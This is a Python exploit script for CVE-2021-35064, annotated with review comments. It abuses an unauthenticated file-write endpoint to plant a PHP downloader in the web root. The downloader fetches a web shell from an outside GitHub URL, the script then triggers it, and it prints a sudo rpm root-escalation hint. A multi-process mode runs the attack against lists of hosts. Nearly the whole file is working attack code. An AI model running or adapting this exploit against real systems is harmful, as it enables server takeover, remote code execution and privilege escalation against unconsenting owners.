import os
import base64
import requests
import argparse
import sys, urllib3
import concurrent.futures
from rich.console import Console
# Every request below is sent with verify=False; silence the per-request
# InsecureRequestWarning so it does not flood the console.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Shared rich console used for all status/verdict output (also from worker processes).
console = Console()
# Base64-encoded ASCII-art banner; decoded and printed once by main().
banner=("ICAgX19fX19fICAgICBfX19fX19fICAgICBfX19fICAgX19fIF9fX18gIF8gICAgICBfX19fX19f"
"X18gICBfX18gICBfXyAgIF8gIF8gICAKICAvIF9fX1wgXCAgIC8gLyBfX19ffCAgIHxfX18gXCAv"
"IF8gXF9fXyBcLyB8ICAgIHxfX18gLyBfX198IC8gXyBcIC8gL18gfCB8fCB8ICAKIHwgfCAgICBc"
"IFwgLyAvfCAgX3wgX19fX18gX18pIHwgfCB8IHxfXykgfCB8X19fX18gfF8gXF9fXyBcfCB8IHwg"
"fCAnXyBcfCB8fCB8XyAKIHwgfF9fXyAgXCBWIC8gfCB8X198X19fX18vIF9fL3wgfF98IC8gX18v"
"fCB8X19fX198X18pIHxfXykgfCB8X3wgfCAoXykgfF9fICAgX3wKICBcX19fX3wgIFxfLyAgfF9f"
"X19ffCAgIHxfX19fX3xcX19fL19fX19ffF98ICAgIHxfX19fL19fX18vIFxfX18vIFxfX18vICAg"
"fF98ICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
"ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKCQkgICAgICAgICBDb2RlZCBCeSBWYWxlbnRp"
"biBMb2JzdGVpbgo="
)
def exploit(host: str) -> None:
    """Run the two-step chain against one host and log the verdict.

    Step 1 (writeFile) sends the file-write request; step 2 (getResult)
    fetches the written file and formats a verdict. writeFile() swallows
    network errors and returns None regardless, so step 2 runs even when
    step 1 never reached the host.
    """
    writeFile(host)
    console.log(getResult(host))
def writeFile(host: str) -> None:
    """Send the single POST that writes caller-supplied content to an absolute path.

    The request goes to ``/ajaxPages/writeBrowseFilePathAjax.php`` with two
    form fields: ``radioBtnVal`` (file body) and ``associateFileName``
    (absolute destination path, here inside the web root). The body staged
    here is a small PHP downloader: when the server later executes it, it
    fetches a second-stage file from a third-party GitHub raw URL with curl
    and saves it as ``pwny.php`` next to itself.

    Network failures are logged and swallowed; the function returns None in
    every case, so the caller cannot tell a successful write from a failed one.
    """
    try:
        # Browser-like header set. Host is pinned to the target, presumably so a
        # name-based virtual host matches — not verified here.
        headers = {
            "Host": f"{host}",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
            "Accept": "text/html, */*",
            "Accept-Language": "en-GB,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "X-Requested-With": "XMLHttpRequest",
            "Sec-Fetch-Dest": "empty",
            "Sec-Fetch-Mode": "cors",
            "Sec-Fetch-Site": "same-origin",
            "Sec-Gpc": "1",
            "Te": "trailers",
            "Connection": "close"
        }
        # write php web shell into the Apache web directory
        # Observable footprint for defenders: a POST to this endpoint whose
        # associateFileName points into the web root, followed by the web server
        # itself opening an outbound HTTPS connection to raw.githubusercontent.com.
        data = {
            "radioBtnVal":'<?php $ch = curl_init("https://raw.githubusercontent.com/Chocapikk/Shells/main/pwny.php");$fp = fopen("pwny.php", "wb");curl_setopt($ch, CURLOPT_FILE, $fp);curl_setopt($ch, CURLOPT_HEADER, 0);curl_exec($ch);curl_close($ch);fclose($fp);?>',
            "associateFileName": "/var/www/html/balgo.php"}
        # Certificate verification disabled; 2 s timeout. The response is not
        # inspected, so an HTTP error status is indistinguishable from success.
        requests.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, timeout=2, verify=False)
    except (requests.exceptions.Timeout,requests.exceptions.ConnectionError,requests.exceptions.InvalidURL,requests.exceptions.SSLError):
        # NOTE(review): the message says "timed out" for any of the four error
        # types, and prints http:// although the request was sent over https://.
        console.log(f"[red][!] Request timed out [/red] http://{host}/")
def getResult(host: str) -> str:
    """Trigger the staged file and return a rich-markup verdict string for *host*.

    Returns the green "Exploited" message (which also carries a
    post-exploitation hint for the operator) when the marker ``'chocapik'``
    appears in the body of ``pwny.php``, otherwise the red "Fail" message.
    Unlike writeFile(), nothing here is wrapped in try/except, so a timeout
    or connection error propagates to the caller.
    """
    # query the web shell, using rpm as sudo for root privileges
    # First GET executes balgo.php (the downloader written by writeFile); its
    # response is bound to dropper_exec but never read.
    dropper_exec = requests.get(f"https://{host}/balgo.php", timeout=2,verify=False)
    # Second GET retrieves the file that downloader was meant to create.
    file = requests.get(f"https://{host}/pwny.php", timeout=2, verify=False)
    # (A commented-out shell fragment stood here; the same hint is part of the
    # success message below.)
    pageText = file.text
    # Success is judged solely on a marker substring in the response body, so
    # any page that happens to contain it (including error pages) counts.
    if 'chocapik' in pageText:
        result = f"[green][<>] Exploited | Shell : [bold]https://{host}/pwny.php[/bold][/green]\n"
        result += "[green][<>] For root : sudo rpm --eval '%{lua:os.execute(\"<COMMAND>\")}'[/green]"
    else:
        result = f"[red][!] Fail [/red] http://{host}/"
    return result
def main() -> None:
    """CLI entry point: print the banner, parse -i/-f, run exploit() on one or many hosts.

    -i runs a single host in-process; -f reads one host per line from a file
    and fans out over a 20-worker ProcessPoolExecutor. Giving both flags
    matches none of the three branches and does nothing.
    """
    # The banner is stored base64-encoded; decode and print it first.
    print("\n" + base64.b64decode(banner).decode("utf-8"))
    parser = argparse.ArgumentParser(prog="CVE-2021-35064.py",
                                     description="Example : python3 %(prog)s -i 127.0.0.1")
    parser.add_argument("-i", help="IP address (not url)")
    parser.add_argument("-f", help="IP file")
    args = parser.parse_args()
    # Neither option given: show usage and stop.
    if not args.f and not args.i:
        parser.print_help()
        sys.exit()
    # Single-host mode.
    if args.i and not args.f:
        exploit(args.i)
    # Multi-host mode. The file path is prefixed with the current working
    # directory, so an absolute -f value is mangled into "<cwd>//abs/path".
    if args.f and not args.i:
        with open(f"{os.getcwd()}/{args.f}",'r') as f:
            ip_list = f.readlines()
        with console.status("[bold green]Exploiting...", spinner='aesthetic') as status:
            # NOTE(review): `status` is bound but never used, and the executor is
            # never shut down (no `with` block or shutdown() call).
            executor = concurrent.futures.ProcessPoolExecutor(20)
            # strip() already removes the trailing newline, so split('\n')[0]
            # is redundant; blank lines still become an empty-string host.
            futures = [executor.submit(exploit, ip.strip().split('\n')[0]) for ip in ip_list]
            concurrent.futures.wait(futures)
        # NOTE(review): original indentation was lost in rendering; exit() is
        # placed after the status block here. This is the site.exit helper,
        # whereas the usage branch above calls sys.exit().
        exit()
# Run the CLI only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    main()